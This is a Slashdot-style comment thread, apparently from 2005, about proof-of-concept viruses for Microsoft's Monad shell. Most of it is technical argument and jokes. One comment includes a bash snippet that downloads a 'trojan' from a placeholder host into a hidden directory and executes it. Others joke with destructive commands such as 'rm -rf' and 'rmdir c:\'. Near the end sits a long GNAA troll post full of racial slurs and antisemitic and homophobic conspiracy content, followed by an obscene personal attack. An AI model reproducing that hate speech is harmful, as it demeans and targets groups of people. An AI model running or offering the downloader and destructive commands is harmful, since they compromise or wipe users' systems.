Windows Vista Tool Targeted By Virus Writers
An anonymous reader writes "Five proof-of-concept viruses that target Monad, the next version of Vista's command prompt, have been published on the web. Monad is a command line interface and scripting language that is similar to Unix shells such as bash, but is based on object-oriented programming and the .Net framework. The viruses' only action is to infect other shell scripts on the host's operating system. They would cause little harm in the wild, but would be relatively easy to modify using the information from the article, said Mikko Hyppönen, the director of antivirus research at F-Secure."
But seriously, this article is very light on the details. I assume that these virus writers found a way to gain administrative rights using Monad, but the article makes it sound like these are just malicious scripts. It might as well be a advanced batch script that can spread it self then del
Microsoft Windows is insecure! More details later, movie at 10.
The fact that MSH is used as the execution vehicle is really a side-note, as it does not exploit any vulnerabilities in Monad. The guidance on shell script viruses is the same as the guidance on all viruses and malware: protect yourself against the point of entry, and limit the amount of damage that the malicious code can do.
That's not to belittle the dangers of script viruses, though.
I wrote a blog entry about it here, in relation to Monad.
It all goes downhill from first post
I wonder why it didn't happen sooner..
Behind attacking Microsoft?
Am I the only one that sees a Mr. Krabs character with Bill Gates face flailing his claws while running in circles yelling, "Mother of Pearl! Fire on the PoopDeck!"
Actually..I probably am.
Quote from MS after discovery of vulnerability: "well, it *is* still in beta...and it's like...more secure than Windows XP...and did we mention it's still in beta and stuff like this doesn't happen after beta and...uh...ummmm...shit"
Content Management System: A pretentious way of saying "text editor."
For MS.
But seriously, this is like tipping over someone in a wheelchair. It's a BETA of WINDOWS. Hopefully MS will learn from this before the release, though. I'm not up for a whole new vector of threats against my windows boxen.
Jerry
http://www.cyvin.org/
I would think that people would quite going after all Windows. After all, there is not that much sport shooting ducks in a barrel. And it will be at least another decade before these ducks learn to fly.
I prefer the "u" in honour as it seems to be missing these days.
Something which requires you to execute a script on the computer is not a virus. Think if you execute a bash script in Linux and it goes on and put itself in all your bash scripts, would you call it a virus?
This is actually nothing, it simply prepends/appends or put itself in the middle of existing MSH scripts. It is equivalent to, if you run a binary on your machine, it can attach itself to all the binaries on your machine.
On top of that, MSH by default on let digitally signed scripts to execute hence once infected scripts on execute. This is not really a threat at all.
I'm sort of surprised that it didn't happen earlier.
What would really be a surprise, pleasant one at that, is to see a F/OSS program actually plug the holes in Vista before it can sink?
Support NYCountryLawyer RIAA vs People
I heard many Monad viruses are cronic and not curable. Only the simptoms can be treated.
Monad can be used to write scripts that do stuff!
How is this different than writing a ksh or bash script virus? Ksh and bash script viruses can be just as bad. Heck, remember the Morris worm?
./er, but this might not be their bad just yet.
I like bashing M$ just as much as the next
The bitter lessons of a veteran coder: http://bitterprogrammer.blogspot.com
Isn't nomad proof-of-concept? or vapor ware? What happen to all the cool stuff longhorn was suppose to have? Next version right?
Why? Do you prefer the release versions of Windows to be vulnerable instead? ;>
Seriously, just wait after that new "new" windoze version gets out of beta to release viruses for it... It will cause even more damage to the already inexistant M$ reputation.
Monad's not going into Vista/Longhorn, hadn't you heard?
I can mail you a Slackware boot disk. It will cure all of Vista's problems, before it is even released. :)
;)
That said, a lot more people would plug Windows holes (if for no other reason than to rid the world of zombies)... if MS would just free the source. But that would probably make poorly-written Perl code look good.
never mind the virus-
windows now has a decent shell?!
will wonders never cease?
K.
Comment removed based on user account deletion
Give M$ some time to work its magic, then there will be plenty of holes and viruses for all!
http://www.macworld.com/news/2005/08/04/vistavirus es/index.php
OMG a shell! it like does things! and without a mouse!!
CURSE: Whoever mods me down with less than 3 due to their other OS bios or anti MS sentiment will never be happy, his/her kids will never love him/her and he will end up wasting his/her life. How can a script which doesn't exploit any vulnerability and requires you to execute it manually on the computer is a threat? Isn't it same as bash and KSH viruses on Linux? Think if you execute a bash script in Linux and it goes on and put itself in all your bash scripts, would you call it a virus? This is actually nothing, it simply prepends/appends or put itself in the middle of existing MSH scripts. It is equivalent to, if you run a binary on your machine, it can attach itself to all the binaries on your machine. On top of that, MSH by default only let digitally signed scripts to execute hence once infected scripts won't execute. This is not really a threat at all. Pissed on Anti-MS dogs...
It a god dam sitting duck.
Charge the earth provide bad service. Refuse to provide replacement disks in case of damage. The list goes on and on.
You attack linux its free you have the source code to play with so any fault you can find you can fix yourself.
You find a fault in microsoft it might take lets say 10 months if you report it to fix but you create a virus it will take a month.
Now its faster to write a virus.
Basicly testers should be rewarded when faults are found ie if you charge money for it pay them some and give the credit for improving you product. And the fix has to happen in a short amount of time.
Wow! Now I get a choice?
The first rule of USENET is you do not talk about USENET.
I'm certain this comment will pit Slashdoter against Slashdoter, but with all the so called "free speech" that is actively being censored one subject at a time today, why is it that these people aren't under the sociopolitical microscope for publishing this kind of information?
Furthermore and looking at the situation from a different angle, not long ago I heard (or read, I can't remember which) someone in the government refer to the writing of malicious code and hacking of computer systems (especially crucial and/or sensitive ones) was to be considered an "act of terrorism." Now tell me, if I or anyone else can be arrested for training people how to commit "acts of terrorism" in the real world, why hasn't this applied to the digital world as yet?
#! /usr/bin/env bash
./trojan
mkdir $HOME/.secret;
cd $HOME/.secret;
wget www.example.com/trojan;
exec
All this proves is that Monad can find and modify text files (and that there are idiots out there who will misuse tools).
About the only way around this is code-signing to prevent modification (yeah, like I'm gonna sign every single perl script I ever wrote.....)
It's not like you can't do this in bash, awk, sed, perl, python, REXX etc. etc.
I must be getting old when i see the full circles everywhere.
when windows 95 came out the windows zealots where so quick to point out "no more haveing to type in dos windows is better than everything" now they will say "we have a shell windows is better than everything"
Agreed.. It may not be a virus per-se, but it's still possibly malicious. Still, you wouldn't go running any Unix shell script without first checking it out, would you?
Actually, code signing does partially solve this problem, so that's one of the avenues we've taken. See my post about it (although I feel like a whore for posting it again.)
That said, once you have a code signing infrastructure to save you from untrusted script publishers, your signing keys become the attack point. Malicious code can create another malicious script, and then sign it with your keys. To prevent that threat, always password protect your signing keys. When you do so, Windows brings up a dialog asking for your permission before it signs the file in question.
It all goes downhill from first post
Quoth the wise man in his treatise Monadology (1714):
"There is also no way of explaining how a monad can be altered or changed in its inner being by any other created thing, since there is no possibility of transposition within it, nor can we conceive of any internal movement which can be produced, directed, increased or diminished within it, such as can take place in the case of compounds where a change can occur among the parts. The monads have no windows through which anything may come in or go out. The Attributes cannot detach themselves or go forth from the substances, as could sensible species of the Schoolmen. In the same way neither substance nor attribute can enter from without into a monad."
And they they've managed to attack them??? Oh, the humanity...
The power of accurate observation is commonly called cynicism by those who have not got it. -- G.B. Shaw
Awwww, crap guys. Let it go already. It's a bit like kicking a crippled at this point.
Quite funny Microsoft is having an enhanced version of command prompt on new Windows. Microsoft said in 1995 that it tries to get rid of command prompt with the next version of Windows (Win 98). What happened to that idea??
Well I guess they've really got Microsoft by the monads now, eh?
;)
Highest form of wit!
All it does is find every .msh file and replace its contents with itself. That's it. You could do it with a .CMD file in any version of Windows (and of course in any other scripting language).
The other scripts get a bit more complicated (insert at a random spot in the file, etc) but that's basically it. There's no new vulnerability exposed by Monad.
- adam
- adam
That's the same issue with email attachment virii... the OS is actually capable of RunningStuff(tm). I mean, sure have the prompt/warning (for a while, didn't norton do this with every script that used the filesystemobject, then they used the ado text object, next it will be something else.. I mean as long as an OS is usable, and the user is a privileged user, it is vulnerable from the user.
I'm glad that low privilege users will be a focus in the new version, but the ability was there since nt3.x iirc, and nobody really focused on it, and 3rd party software was so badly written, you couldn't do much with it a lot of times. Another issue, is you can't change many UI settings as an unprivileged user in windows, this pisses people off... fix that, get developers to write their software for proper use, and a lot of these issues will fade.
Michael J. Ryan - tracker1.info
It should be "Windows XP/2003/Vista Tool Targeted By Virus Writers". It won't just be for Vista. The tool is also still in early beta, and I'm not even sure what the script did; is it a script like "rm *", or does it exploit any actual vulnerabilities? There's too little info here to know if this is anything to call news or not...
Monad will also not be included with Windows Vista RTM.
Beware: In C++, your friends can see your privates!
Tis called innovation.
First off -- credit where it's due, it took a few days for these to show up. Unlike the mere hours it took before.
Big pat on the back to all you Windows coders out there in Redmond!
Second and most important, these are only shell scripts meant to be executed in Monad -- not some nasty Outlook/IE infecting VB script that spreads like super-flu.
No... those wont babies wont be hatching till NEXT week.
I'd say this is a marked improvement in Windows Security overall. Bill must be proud right about now.
"Only problem is, Monad is not included in the Windows Vista beta code."
It will probably not be included in the final Windows Vista code either.
It'll be a separate, downloadable tool for all MS OS'es since Windows XP.
I'm still looking for the connection to Windows Vista here...
Beware: In C++, your friends can see your privates!
I do actually. I get opportunities to say "well what do you expect if you use Windows?" to people that way.
Of course, to be fair to MS, in this case the article is BS.
Combine the power and flexability of Unix-style scripting with the robust security of a Microsoft environment. As long as the millions of less savvy users are all operating within least-privalege account model this should be great.
Monad is now a "Windows Vista Tool." And just 2.5 months ago, Slashdot indicated Monad wouldn't be in Windows Vista (then codenamed Longhorn).
So when Monad is considered a feature, it won't be in WV, but when it is a problem, it's magically back in there.
The truth is, no one knows for sure if Monad will be in, and this "virus" is just a fucking shell script.
Everyone, type rmdir c:\ and pass it along.
Ironically, the word ironically is often used incorrectly.
As much as i despise microsoft and avoid using windows at whatever cost. They have not released Vista to end users yet. The purpose of a beta is to find out what the problems and issues are and resolve them. Wait until they release a final before criticising I am sure there will be plenty of viruses and bugs to get excited about then! (How else are they going to continue shipping their AV software ?)
Electronic Music Made Using Linux http://soundcloud.com/polyp
But I'm sure that's just a coincidence.
You must think in Russian.
"Certainly there are potential issues, but I don't think there's really anything to panic about yet."
Aw, darn! And I just bought a whole truckload of panic buttons too. Whatever am I going to do? Hmmm...maybe I can sell them overseas? Hopefully they'll sell better than last year's hot buttons, and the previous year's cute-as-a-button.
See this post on F-Secure's site:
8 2005.html#00000613
"These proof-of-concept viruses will never became [sic] a real-world problem, but the case is interesting historically, as these are the first viruses for a totally new platform."
Is a virus a virus if it never is "a real-world problem"?
http://www.f-secure.com/weblog/archives/archive-0
Monadology seems to be a protoscience towards the understanding of the fundamental building blocks of the universe. Today we call things Quantum back then it was essences. Notice how consciousness is described as an attribute of matter instead of an emergent artifact which in a real sense does not physically exist within our Universe, it only logically exists like calling a collection of cells a "glider" in Conways Game of Life.
My 2 cents anyway.
Here's the very Squashed version with the important text reproduced here:
All the plenum of the universe is entirely filled with tiny Monads, which cannot fail, have no constituent parts and have no windows through which anything could come in or go out. Every Monad is different and is continuously changing. All simple substances or Monads might be called Entelechies, for they have in them a certain perfection and a certain self-sufficiency. As they have some perception and desire, they may be called souls, but animal Souls are accompnied by memory. In dreamless sleep our soul is like a Monad. The knowledge of necessary and eternal truths distinguishes us from the animals and gives us Reason. Truths of reasoning are necessary and their opposite is impossible: truths of fact are contingent and their opposite is possible. When a truth is necessary, its reason can be found by analysis, resolving it into more simple ideas and truths. The final reason of things must be in a necessary substance, which we call God. God holds an infinity of ideas, and chooses the most perfect ones. Each simple substance has relations which express all the others, and, consequently, that it is a perpetual living mirror of the universe; though it represents more distinctly the body of which it is the entelechy. Each portion of matter is like a pond full of fishes, where each drop of its liquid parts is also another pond. Thus there is nothing fallow, nothing sterile, nothing dead in the universe. All the parts of every living body are full of other living beings, each with its dominant entelechy or soul. Thus there never is absolute birth nor complete death. Minds are images of the Deity, capable of knowing the system of the universe, each being like a small divinity in its own sphere. Whence the totality of all spirits must compose the City of God, where no good action would be unrewarded and no bad one unpunished. If we could understand the order of the universe, we should find that it exceeds the desires of the wisest men.
Shh.
In Soviet Russia, the gonards eat you!
And thought, "shit! my computer can get gonorrhea!!" (also known as Vista pka Longhorn)
:-(
Anyway, so what. Prediction: 1 week after Vista based servers come out, my internet will mysteriously slow down as a new attack wreaks havoc on all my fav pr0n sites.
#hostfile 0.0.0.0 primidi.com 0.0.0.0 www.primidi.com 0.0.0.0 radio.weblogs.com
2) assume you already have command line access
a "virus" at this point is trivial... just append the code to append itself at the end of every file it assumes is a script for this command line.
this is like batch file viruses that format the drive... it isn't anything special, it's just a matter of getting the mark to run the file. nothing to see here.
Thing is, msh is not registered as handler for *.msh files, so in order to run the script you will have to execute 'msh.exe script.msh' from the command-line, it will not work by clicking an icon in Outlook Express for example.
fair enough.. I don't consider it a big issue in and of itself.. it's a scripting language, it's usable.. that's the point of it.
Michael J. Ryan - tracker1.info
If Microsoft made Windows completly immune to viruses, spyware, and the like, they would be immediatly sued by every dying for-profit anti-virus company, just like Netscape did.
Today: ignorance = funny.
For days moderation is hideously slow then a Microsoft story comes up... funnyfunnyinsightfulfunnyinteresting
CRIPPLE FIGHT!
I'm going to go create my own technology news site, with blackjack and hookers. You know what? Forget the news site.
The more sophisticated you make a system, the more failure modes you introduce -- and the harder it gets to test the edge cases, because there end up being too many edges. You want Obejct Oriented? I'll give you an Object Oriented example. Let's have a "length" type with properties which correspond to its conversion into different measuring units.It may well be pretty, but outside of any programme dealing with units conversion it's fairly unnecessary. And it contains many programming hazards which would thwart the careless implementor. {BTW, that was a fictitious example; but I'm willing to bet there is at least one programming language out there that actually implements something like it.}
All a command shell really has to do is be able to launch programmes, police the I/O traffic and keep hold of some state information. If it can do all that right, any other functionality you need can be provided by external programmes. That way, everything is kept as simple as it needs to be; you haven't got code cluttering up things that don't need it. If you do build functionality into the shell, there should be a bloody good reason -- usually that reason is that some external programme is getting launched more than its fair share. And in that case you already have the code you need to incorporate and it's been thoroughly tested.
Je fume. Tu fumes. Nous fûmes!
So a beta release of your software goes out to about 500.000 beta testers & developers, and and up in the hands of concept virus writers within about a week after releasing it?
So your group of testers is not 100% trustworthy and to write a new concept virus only takes 1 week (including the "learning curve" on the new shell environment?).
It is going to be a bright and shiny future.
My wife's sketchblog Blob[p]: Gastrono-me
I mean .. this is not a vulnerability. Every scripting langauge _needs_ this functionality. Heck, it was pretty easy to do it in bash.
If Microsoft just gets the permissions right in windows this time around, not making everything executable by filename extension, then it might not even be used as an injection vector against idiot-users.
Hasn't Monad been dropped from the Vista/Longhorn Feature list?? I thought that it as just going to have the same/similar CLI as Windows XP? and Monad was going to be an 'upgrade' some time in the future?
.
As time goes on, they keep reinventing bits and pieces of Unix.
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
Two differences that spring to mind are:
It's more of the same from M$.
Friends don't help friends install M$ junk.
So now Windows has been hacked before its been released? I for one pay homage to our new futurehacker overlords!!! in soviet russia, windows hacks you before it gets released!!!!
Wake up fuck-tards
WAKE UP !
anyone with a clue would have seen, this is FUD. Whoever calls a shell-script a virus belongs to be kicked in the gonads.
first of all, the kiddo tried to show off by writing a few lines of weak shell - stuff you might already do using VBA or cmd stuff right now. all that changed was syntax.
second - fsecure (f*** secure) is a bunch of sensationalistic marketing boo-men, clueless at best, for falling for this.
thirs - whoever posted the article did NOT understand what he was writing about - no clue at all - and did not ask anyone on that topic.
crappy research, dude. close that article. Voting -5 Crap/FUD
...picturing some poor dude with a single inflamed testicle!
Apparently they haven't been around things like BASH enough because it's not very hard to write a similar "virus" in BASH script
After docking with someone elses equipment, my monad will never be the same.
From this relevant resource.
1. It's like a batch file and therefore doesn't count as a virus.
...but viruses started out as batch files and wiped a lot of harddrives.
...but Windows has a long history of MSTD (Microsoft Terminal Disease) wherein everything is accessible all the time because they built an OS (nay, an NOS) on the principle of "everything is accessible unless explicitly stated otherwise." No other NOS has done this -- no serious one that's broadly used -- so Windows viruses, no matter what they are, have been very egregious.
2. Microsoft can't be held responsible because shell scripts can be written and ran in *nix/*nux too, so what's the big?
The issue, to me, is whether or not Microsoft has finally figured out to really seperate the kernel (if they've ever really developed one) from what the user has access to. The reason viruses, malware, whatever, have never really bothered *nix/*nux/Netware is because of the basic principle of denying everything unless explicitly stated otherwise.
Our old Netware guys here still joke and laugh about the insanity that is Windows and security issues around it that a symbiont industry thrives on. Never did, or have, other NOSes generated such a special security area in the free market....
"All great things are simple & expressed in a single word: freedom, justice, honor, duty, mercy, hope." --Churchill
Originally, Microsoft told us that we could expect WinFS and a new command prompt to be released with the next version of Windows. Now, according to the fine article, "Microsoft hinted a couple of months ago that [Monad] may not be ready for initial versions of the Vista client or server".
So exactly what will Windows Vista ship with besides a boat load of crap that takes functionality away from me?
My lame blog.
Bugs and security holes in a beta? No! It's impossible. Not that Microsoft gets the benefit of the doubt anymore, but let's at least wait until the product is out of the beta testing phase before we begin harping on it for bugs and security flaws. Unless, of course, the flaws exist because of fundamental problems with the design of the product (a la Internet Explorer). Then by all means, pile on!
Vista looks like a flop from the start: delays and further delays, slow as a snail, buggy as hell, the user interface sucks, and now there already the first viruses targeting it. I am so glad I have a Linux box and don't have to deal with any kinds of windows problems anymore.
Here was my first thought (it's obvious i didn't get much sleep last night)
Monad kinda sounds like it's a daemon related to a female...something that most geeks probably don't know much about....I bet this is a hoax...
Maybe it's time for sleep again.
AccountKiller
/. - Bringing you yesterdays news.. TODAY!!
OSS developers combine Northern charm with Southern efficiency.
He found a hole in a peice of BETA software...
last I checked the entire point of BETA sofware was to find holes in it.
ZOMGWTFBBQ he did exactly that! Whooptie fucking do!
you have earned yourself a cookie! go report it to whatever bug tracking sceme they're using and feel proud. or, do something tantamount to screaming "LOOKIT ME! I'M EVER SO SMART!" into a bullhorn while dancing naked with undies on your head in the middle of times square...
...I got nothing.
From a Dec. 2004 "chat": Q: How is security addressed in Monad? A: This is a very board topic. We spend a lot of time on security. One of the common questions is "are we reintroducing script attacks?". We are doing a number of things to mitigate those exposures. 1) we will not have a doc handler for .msh files (this means that you won't be able to double-click a .msh file and have it run). 2) We'll have a policy that only allows signed scripts (from people you trust) to run (we'll then make it easy for you to sign scripts).
Why do I get the feeling that this is the Monad equivalent of
$ echo "#!/bin/rm -rf" > ls
and probably not nearly as dangerous as the article makes it sound.
Why not fork?
Again, an other stupid article.
1st- This has nothing to do with Vista.
2nd- Any scripting can be used to do bad things.
3rd- Every Unix has similar scripting.
Get a life assh....
similar to Unix shells such as bash, but is based on object-oriented programming and the .Net framework.
.Net framework was supposed to prevent malicious code by sandboxing things.
I thought that the
Coder's Stone: The programming language quick ref for iPad
Didn't Microsoft recently admit that .NET was a failure? If so, why are they including it in the core of Windows Vista?
why is this modded insightful?
"Our interests are to see if we can't scale it up to something more exciting," he said.
The vulnerabilities found are just a function of how popular the system is in the real world. Microsoft is a victim of its own success.
If Linux had as huge an installed base as Microsoft Vista then we would see all the script kiddies exploiting and 'owning' Linux boxes.
(c)2007
They whose government reduces their essential liberties for temporary security, receive neither liberty nor security.
It's a security best practice in a multi-user system, so I'm not sure what your point is. It was in Unix long before it was in Windows, but that doesn't change anything. The flow goes both ways.
That said, Monad does offer many things that make it incredibly unique as a shell. You can try it for yourself, or simply read commentary from people who have. There are a lot of unix geeks (myself included) that really think it is a lot of fun. I have a lot of Monad examples on my blog, should you be interested.
It all goes downhill from first post
Am I the only one to have seen every release of Microsoft since CP/M? Must be.
OF COURSE the virus writers already have a jump on the product before the beta is done. You don't really think 8,000 viruses this year so far, just *happen* do you?
The cycle continues.
The release.
The press proclaiming that it isn't selling. A handful of corporations jump on it for the same stupid reasons one can only make when earning more than a million dollars each year. (corporate stupidity).
Then comes the inevidable "We're going to stop supporting old release X" when more jump on board.
Just as people are getting settled in, OH! It's time for a new Office and maybe Works! The old ones are grossly incapable of doing simple math and are seriously lacking 'cool', so the herd begins to turn and shed their cash.
There are still people running DOS, ya know. And Wfw. And Win9x. They're happy as long as they don't use the net. (So they're safe)
When will corporate America and the man on the street tire of being surprised at this rope-a-dope?
--- For a good time mail uce@ftc.gov
is more akin to the bastard child of wmic and cmd; at least the beta i last saw was.
It's just a beta product. All flaws are not fixed yet.
I suppose you all remember when Whistler (codename for windows XP) came out, it was full of bugs and security holes. This is normal, it's a beta. Now we all know that Windows XP is stable and secure as hell *cough cough*
Because this certainly confirms that windows virus's have a new VISTA to exploit!
[Now, I'm off to lift my le... Um, visit... at another place.]
Impi - Research Division, South Africa.
Due to my extensive research of The Negro archives, I have discovered that the ACTUAL name of the airplane that dropped the atomic bomb on Hiroshima and Nagasaki, was in fact THE ENOLA GAY NIGGER and not, as is widely misrepresented, The Enola Gay. This clear plot, by Zionist oppressors, to besmirch and belittle our glorious Gay Nigger history has left an indelible sense of frustration and desperation on the current generation of our persecuted brothers.
With this in mind: Areems, Fresh from the Counter Strike World Championships (for Mac users), who is stuck in Iraq because no aircraft can accommodate his girth, got a lucky headshot on failed blogger Vincent Stephen.
True to Zionist form, an Ultra Top Secret Wing of MOSSAD, The Jewish Justice League, sprung into action. They concocted a media plot to create the illusion that a disgruntled, never heard of before insurgent group, claimed responsibly for this deed.
Conspiracy theorists among the Negro population have evidence that this type of persecution of The Gay Niggers is due to the fact that most Israeli men are secretly attracted to Gay Niggers. Evidence in point is the term coined by Ariel Sharon, a closet Nigger Lover, "Pulling out of the Gaza Strip". It is a widely known and accepted fact that The Gaza Strip is a term of endearment for BLACK ASS.
About The Jewish Justice League
The Jewish Justice League was founded by the mothers and wives of Israel who were concerned that their men were being drawn to the Nigger Seed and away from their wives.
About Areems
Fat.
About GNAA:
GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the first organization which gathers GAY NIGGERS from all over America and abroad for one common goal - being GAY NIGGERS.
Are you GAY ?
Are you a NIGGER ?
Are you a GAY NIGGER ?
If you answered "Yes" to all of the above questions, then GNAA (GAY NIGGER ASSOCIATION OF AMERICA) might be exactly what you've been looking for!
Join GNAA (GAY NIGGER ASSOCIATION OF AMERICA) today, and enjoy all the benefits of being a full-time GNAA member.
GNAA (GAY NIGGER ASSOCIATION OF AMERICA) is the fastest-growing GAY NIGGER community with THOUSANDS of members all over United States of America and the World! You, too, can be a part of GNAA if you join today!
Why not? It's quick and easy - only 3 simple steps!
Talk to one of the ops or any of the other members in the channel to sign up today! Upon submitting your application, you will be required to submit links to your successful First Post, and you will be tested on your knowledge of GAYNIGGERS FROM OUTER SPACE.
If you are having trouble locating #GNAA, the official GAY NIGGER ASSOCIATION OF AMERICA irc channel, you might be on a wrong irc network. The correct network is NiggerNET, and you can connect to irc.gnaa.us as our official server. Follow this link if you are using an irc clien
Mynecology?
There is no right to feel safe thru security vaudeville at the expense of everyone's freedom, privacy and tax money.
Nice to see not all /.'s jumped on the bashing bandwagon this time. Still, a lot did the blind bashing.
s p
http://www.eweek.com/article2/0,1895,1844239,00.a
Monad is not a part of Vista. It is a Beta scripting language (due in a couple of years) on a beta OS. (that it will not be a part of)
Sure, Microsoft will fix some holes on the way to the final product. But given there past history, there are going to be new viruses for Windows Vista the day it comes out, along with new type of spyware . The same old story.
Twitter, you're a petulant cock-gobbling sycophant to Linux Torvaldyos! Quit taking DP from ESR and RMS's feculent cocks and why don't you try to stop sucking quite so much? Get out of your parents' basement and see the real world - maybe then you'll see how pathetic you sound, with your neverending stream of bullshit about how Microsoft is stalking you. Wasn't it you who said that Microsoft believes your insane ranting is actually a threat to them, so they PAY PEOPLE to reply to you on Slashdot? No sir, I don't get any money. I do it for the love. Someone has to go up against your paranoid whining. So get back in your cage and shut the fuck up already.